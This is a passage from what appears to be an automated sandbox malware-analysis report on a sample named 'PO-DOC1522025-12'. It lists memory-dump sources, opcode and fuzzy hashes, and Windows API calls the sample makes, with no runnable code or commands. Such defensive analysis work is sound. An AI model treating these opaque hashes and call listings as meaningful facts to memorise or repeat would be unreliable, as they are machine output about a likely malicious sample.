                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wsopen_s
                                                                                    • String ID:
                                                                                    • API String ID: 3347428461-0
                                                                                    • Opcode ID: d612ad91ba4fe8eec4871fd71cf52115811780082cd4112405490dbcacefd360
                                                                                    • Instruction ID: 594a49c1b32aa92fca752eeb5f2722b3f5da8ed7bba543b7b1da96cbc26c1c9f
                                                                                    • Opcode Fuzzy Hash: d612ad91ba4fe8eec4871fd71cf52115811780082cd4112405490dbcacefd360
                                                                                    • Instruction Fuzzy Hash: 7111487190810AAFCB05DF58E944A9A7BF4EF48314F108059F809AB312DB70EA11CBA4
                                                                                    APIs
                                                                                      • Part of subcall function 00174C7D: RtlAllocateHeap.NTDLL(00000008,00141129,00000000,?,00172E29,00000001,00000364,?,?,?,0016F2DE,00173863,00211444,?,0015FDF5,?), ref: 00174CBE
                                                                                    • _free.LIBCMT ref: 0017506C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 614378929-0
                                                                                    • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                    • Instruction ID: c6b0e97005bb097bc09479a45bcf41d0f0afd96596ed0a0f532df9eda933734a
                                                                                    • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                    • Instruction Fuzzy Hash: 550126722047086BE3218E659881A5AFBF9FB89370F25451DF19883280EB70A805C6B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                    • Instruction ID: c1ea313cb3774b737b3be2df8261359b3ea34258dfcead8edd5c43737755358c
                                                                                    • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                    • Instruction Fuzzy Hash: A1F02836910A24ABC7313A79DC05B9A33E89F72334F104719F428931D2DB70D8128AA6
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 176396367-0
                                                                                    • Opcode ID: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
                                                                                    • Instruction ID: c9be9982dbbce08282629cb909c93cb8bf327cd4dd69e68a6a0971e2b98cb951
                                                                                    • Opcode Fuzzy Hash: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
                                                                                    • Instruction Fuzzy Hash: 42F0C8B3600610AED7159F68DC06A67BB98EB54760F10852EFA19CF1D1DB31E514C7E0
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,00141129,00000000,?,00172E29,00000001,00000364,?,?,?,0016F2DE,00173863,00211444,?,0015FDF5,?), ref: 00174CBE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: bb59b219a21df14828178fc8661ffb297078275a5d542256e29b77733a85e138
                                                                                    • Instruction ID: 547e0c8cf05e84190e67337b3ea12b595278b0d1d6acd138f603f7a2d6323be2
                                                                                    • Opcode Fuzzy Hash: bb59b219a21df14828178fc8661ffb297078275a5d542256e29b77733a85e138
                                                                                    • Instruction Fuzzy Hash: 17F0E931603224A7DB235F629C09B5A37A8BF517A0B19C515FD1DA61C4CB30DC1196E0
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00211444,?,0015FDF5,?,?,0014A976,00000010,00211440,001413FC,?,001413C6,?,00141129), ref: 00173852
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 812f083da1367f407daeba73e9299c55a921428dbb80a105c6d2592700a5a109
                                                                                    • Instruction ID: 3b23d3ba147a3b449f34fdcd8a37c9c489372a684e45fedcd1fb4df464786819
                                                                                    • Opcode Fuzzy Hash: 812f083da1367f407daeba73e9299c55a921428dbb80a105c6d2592700a5a109
                                                                                    • Instruction Fuzzy Hash: B7E0E53110122597D7212A669C04F9A3768AB527B0F158326BC3C929D5CB31DD11A1E2
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144F6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID:
                                                                                    • API String ID: 3664257935-0
                                                                                    • Opcode ID: 4fc2bb5d2ed9c7e1fbbc4c7ee26e15af878170a2e9d4896bfcc359c2a111a86a
                                                                                    • Instruction ID: dcb2052d327225042689df4894b5ba4f835fdb0f91579ace7abd540d2136860c
                                                                                    • Opcode Fuzzy Hash: 4fc2bb5d2ed9c7e1fbbc4c7ee26e15af878170a2e9d4896bfcc359c2a111a86a
                                                                                    • Instruction Fuzzy Hash: 13F03071105752CFDB389F68D490922B7E4AF143193108A7EE1EA82531C7319848DF50
                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0018EE51,00203630,00000002), ref: 001ACD26
                                                                                      • Part of subcall function 001ACC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,001ACD19,?,?,?), ref: 001ACC59
                                                                                      • Part of subcall function 001ACC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,001ACD19,?,?,?,?,0018EE51,00203630,00000002), ref: 001ACC6E
                                                                                      • Part of subcall function 001ACC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,001ACD19,?,?,?,?,0018EE51,00203630,00000002), ref: 001ACC7A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Pointer$Write
                                                                                    • String ID:
                                                                                    • API String ID: 3847668363-0
                                                                                    • Opcode ID: 0e185c16953dcec617cc6500b56b6f37e9d55d0fb97dbd0d0796ed82a1eb8651
                                                                                    • Instruction ID: 4fd93b89294dc4dc49aba842995b9252be6e4fab9d47afcfb627eb0a34ffc041
                                                                                    • Opcode Fuzzy Hash: 0e185c16953dcec617cc6500b56b6f37e9d55d0fb97dbd0d0796ed82a1eb8651
                                                                                    • Instruction Fuzzy Hash: C9E0397A400714EFC7219F8AD9008AABBF8FF85260710852FE99682510D3B1AA54DBA0
                                                                                    APIs
                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00142DC4
                                                                                      • Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongNamePath_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 541455249-0
                                                                                    • Opcode ID: 6b7b017d2cc831c445b4a56803db14909f96509123d6842af102fd86e2de3527
                                                                                    • Instruction ID: 7b58332a982d034d5c1443cad7ff2861919dde146e009e9ac800466e52156d1b
                                                                                    • Opcode Fuzzy Hash: 6b7b017d2cc831c445b4a56803db14909f96509123d6842af102fd86e2de3527
                                                                                    • Instruction Fuzzy Hash: 9DE0CD726011245BCB10A2589C05FDA77DDDFC8794F040071FD09D7258DA60AD84C691
                                                                                    APIs
                                                                                      • Part of subcall function 00143837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00143908
                                                                                      • Part of subcall function 0014D730: GetInputState.USER32 ref: 0014D807
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00142B6B
                                                                                      • Part of subcall function 001430F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0014314E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                    • String ID:
                                                                                    • API String ID: 3667716007-0
                                                                                    • Opcode ID: f21425c047bd2e7623290250902744fe2089d0d912c086ccfa507dfd466c1409
                                                                                    • Instruction ID: 5ca5d3463da08ae5ce1070a56c7c57a96e687ce5d32eebc98785916cf379bcf1
                                                                                    • Opcode Fuzzy Hash: f21425c047bd2e7623290250902744fe2089d0d912c086ccfa507dfd466c1409
                                                                                    • Instruction Fuzzy Hash: A1E0262230020503CA04BB74B8124AEB3499BF1315F40063EF15243173CF7045958251
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00180704,?,?,00000000,?,00180704,00000000,0000000C), ref: 001803B7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 2496a1cfd18e288c6b21449ed6dcabde4280d34920d435af07548f90903a2aad
                                                                                    • Instruction ID: cc8f5daa0c94d63df840f0f805e9a8a177b8b43bf6a5b6a9109cb31f1539746f
                                                                                    • Opcode Fuzzy Hash: 2496a1cfd18e288c6b21449ed6dcabde4280d34920d435af07548f90903a2aad
                                                                                    • Instruction Fuzzy Hash: 31D06C3204010DFBDF029F84DD06EDA3BAAFB48714F014000BE1856020C732E861EB90
                                                                                    APIs
                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00141CBC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoParametersSystem
                                                                                    • String ID:
                                                                                    • API String ID: 3098949447-0
                                                                                    • Opcode ID: 920f538ebc21d1f25ad5ff26f5633bf5c13deca1ce2fd04f77f25179a98b3485
                                                                                    • Instruction ID: fcc3d4383b3596f7fe73fa7007c1ec634076f994e0c9fa848cb374729e250db2
                                                                                    • Opcode Fuzzy Hash: 920f538ebc21d1f25ad5ff26f5633bf5c13deca1ce2fd04f77f25179a98b3485
                                                                                    • Instruction Fuzzy Hash: BBC09B36381305EFF6144B80BC4EF507755E358B00F44C501F709655E3C7B11470D650
                                                                                    APIs
                                                                                      • Part of subcall function 00145745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0014949C,?,00008000), ref: 00145773
                                                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 001B76DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 1214770103-0
                                                                                    • Opcode ID: 8c8bbaa9b17df3c67353e4ac36c0c7b8ee1aede30db8a5eb1eb3bcd307d92ca0
                                                                                    • Instruction ID: 480f104c770760b993d6ac01bf2455d85a7958636ec9858ab31c931e63c29657
                                                                                    • Opcode Fuzzy Hash: 8c8bbaa9b17df3c67353e4ac36c0c7b8ee1aede30db8a5eb1eb3bcd307d92ca0
                                                                                    • Instruction Fuzzy Hash: 2D8180306087019FD714EF28C491BAAB7E5BF99314F04452DF89A5B2E2DB70ED45CB92
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000001F4), ref: 00F4CC11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                    • Instruction ID: d486a8911f2f31693350c174b1fbd8c7ba965625fc3659fc9ec806098c7a7ebe
                                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                    • Instruction Fuzzy Hash: 26E09A7494110DAFDB00EFA4D64969E7BB4EF04301F1005A1FD0596680DA309A549A62
                                                                                    APIs
                                                                                    • CloseHandle.KERNELBASE(?,?,00000000,001824E0), ref: 00146266
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: 6cd94fb60e71d48d01a6b2f1dcb3f980c35fc6b7a745f5eca6194c8435c3b8d8
                                                                                    • Instruction ID: ca958cf75e6a4246d7b9a2b313d1d79e00cc7d6fa24935803e8758c1b9baeeb6
                                                                                    • Opcode Fuzzy Hash: 6cd94fb60e71d48d01a6b2f1dcb3f980c35fc6b7a745f5eca6194c8435c3b8d8
                                                                                    • Instruction Fuzzy Hash: 5DE09275401B01EEC3314F1AE804812FBE5FFE23653214A2ED0E692660D3B05886CB51
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000001F4), ref: 00F4CC11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                    • Instruction ID: 3cdfe69c711f3e7a8204ce5d138faeaaabf89cec2e46c1e73be3c193e83c1d0e
                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                    • Instruction Fuzzy Hash: 96E0E67494110DDFDB00EFB4D64969E7FB4EF04301F100561FD05D2280D6309D509A62
                                                                                    APIs
                                                                                      • Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2
                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 001D961A
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001D965B
                                                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 001D969F
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001D96C9
                                                                                    • SendMessageW.USER32 ref: 001D96F2
                                                                                    • GetKeyState.USER32(00000011), ref: 001D978B
                                                                                    • GetKeyState.USER32(00000009), ref: 001D9798
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001D97AE
                                                                                    • GetKeyState.USER32(00000010), ref: 001D97B8
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001D97E9
                                                                                    • SendMessageW.USER32 ref: 001D9810
                                                                                    • SendMessageW.USER32(?,00001030,?,001D7E95), ref: 001D9918
                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 001D992E
                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 001D9941
                                                                                    • SetCapture.USER32(?), ref: 001D994A
                                                                                    • ClientToScreen.USER32(?,?), ref: 001D99AF
                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001D99BC
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001D99D6
                                                                                    • ReleaseCapture.USER32 ref: 001D99E1
                                                                                    • GetCursorPos.USER32(?), ref: 001D9A19
                                                                                    • ScreenToClient.USER32(?,?), ref: 001D9A26
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 001D9A80
                                                                                    • SendMessageW.USER32 ref: 001D9AAE
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 001D9AEB
                                                                                    • SendMessageW.USER32 ref: 001D9B1A
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 001D9B3B
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 001D9B4A
                                                                                    • GetCursorPos.USER32(?), ref: 001D9B68
                                                                                    • ScreenToClient.USER32(?,?), ref: 001D9B75
                                                                                    • GetParent.USER32(?), ref: 001D9B93
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 001D9BFA
                                                                                    • SendMessageW.USER32 ref: 001D9C2B
                                                                                    • ClientToScreen.USER32(?,?), ref: 001D9C84
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 001D9CB4
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 001D9CDE
                                                                                    • SendMessageW.USER32 ref: 001D9D01
                                                                                    • ClientToScreen.USER32(?,?), ref: 001D9D4E
                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 001D9D82
                                                                                      • Part of subcall function 00159944: GetWindowLongW.USER32(?,000000EB), ref: 00159952
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 001D9E05
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                    • String ID: @GUI_DRAGID$F$p#!
                                                                                    • API String ID: 3429851547-2808124883
                                                                                    • Opcode ID: db1701c0be686a09c34a812f32fab54525693b4439208972ee6eba40ac6b7c56
                                                                                    • Instruction ID: 22712d5d21ecc5f1d449b435e0e2588e40adcfa11e9820f69a3e897d642878ef
